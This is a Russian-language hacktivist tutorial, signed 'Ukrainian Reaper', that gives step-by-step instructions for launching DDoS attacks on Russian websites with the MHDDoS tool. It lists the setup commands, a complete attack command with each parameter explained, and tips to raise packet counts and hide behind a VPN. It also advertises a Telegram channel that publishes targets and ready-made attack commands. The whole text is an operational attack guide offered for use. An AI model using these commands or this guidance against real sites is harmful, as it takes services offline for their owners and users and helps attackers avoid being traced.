DDoS по-взрослому

Привет, киберсловяне!

На связи Украинский Жнец со срочным включением: На протяжении прошлых суток была проведена неслабая работа по поиску действительно рабочих утилит по запуску DDoS-атак на руснявые цели, кроме тестирование каждого такого средства была произведена работа над ошибками, так как документация некоторых средств написана под устаревшие образы ОС.

Сегодня мы нашли хорошее средство, мы сообща исправили ошибки по документации и протестировали атаку на некоторых «слабеньких» сайтах чтобы удостовериться в эффективности. Хватит слов, погнали делать!

MHDDoS

Утилита подгружает очень много различных тулзов по ддосу на разных уровнях, в этом туториале разберем одну из самых простых и рабочих, а именно BYPASS http-запросов. Данная тулза отправляет установленное вами количество «неполных», но якобы легитимных http/https-пакетов. Неполные пакеты, это пакеты, в которых удалены некоторые http-заголовки, атакуемый веб-сервер потратит определенное время и ресурсы на обработку и последующую блокировку таких пакетов. В то время как вы отправите 1000 таких пакетов сервер начинает грустить, отправьте 10 000 пакетов и запинайте русаковоского сис админа пока он в поте лица будет бесконечно ребутать сервер;)

Гайд по использованию

Открываем нашу виртуальную среду с Kali Linux, и не забывайте про VPN;). Если Ваша виртуальная рабочая среда ещё не подготовлена, вернитесь к предыдущему туториалу.

p.s. Значок "#" вводить не нужно, это обзначение наших комментариев для объяснения каждой команды.

Открываем Терминал и поочередно вводим следующие команды:

• sudo su #Повышаем привилегии до root-пользователя
• apt install python3-pip #Устанавливаем пакеты pip3, так как DDoS-тулза это .py скрипт

• git clone https://github.com/MHProDev/MHDDoS.git #Создаем локальную копию тулзы

• cd MHDDoS #Переходим в директорию с нашей только что клонированной тулзой
• pip3 install -r requirements.txt #Подгружаем все требуемые пакеты для использования всех методов DDoS-атак. Потребуется время на подгрузку, процесс загрузки будет отличаться от скриншота (на примере эти пакеты уже были установлены). Предупреждение (выделенное оранжевым) о запуске пакетов от имени root-пользователя игнорируем.

И наконец, переходим к запуску атаки с использованием следующей команды:

• python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100 true

Где:

• https://example.com – веб-адрес(ссылка) атакуемой цели. Если сайт работает на http, а не https то вводим в формате http://example.com
• 1000 – количество «угроз», а именно http/https-пакетов, которые будут отправлены на атакуемый сайт.
• 100 – первое значение «100» это количество сокетов – подключений к сайту в рамках которых будут отправляться наши 1000 зловредных пакетов.
• 100 – второе значение «100» это продолжительность атаки в секундах

Hint:

Увеличивайте и тестируйте количество отправляемых зловредных пакетов в зависимости от нагрузки на вашу виртуальной ОС. Мы тестировали с шагом 4000. Нагрузку на вашу виртуальной ОС (Kali Linux) можно мониторить на верхней панели в графиках. Зеленый график – CPU, Синий – ОЗУ(RAM).

Удачной бомбардировки господа и Слава Украине!

Подготовил Украинский Жнец

Подготовил Украинский Жнец

• Наш Telegram-канал #Тут публикуем цели, подготавливаем для Вас команды для атаки и выкладываем новые гайды
• Наш Telegram-чат #Вам тут помогут включить компуктер и стать украинским жнецом, которого будут боятся все русские веб-сервисы

Удачи, господа и Слава Украине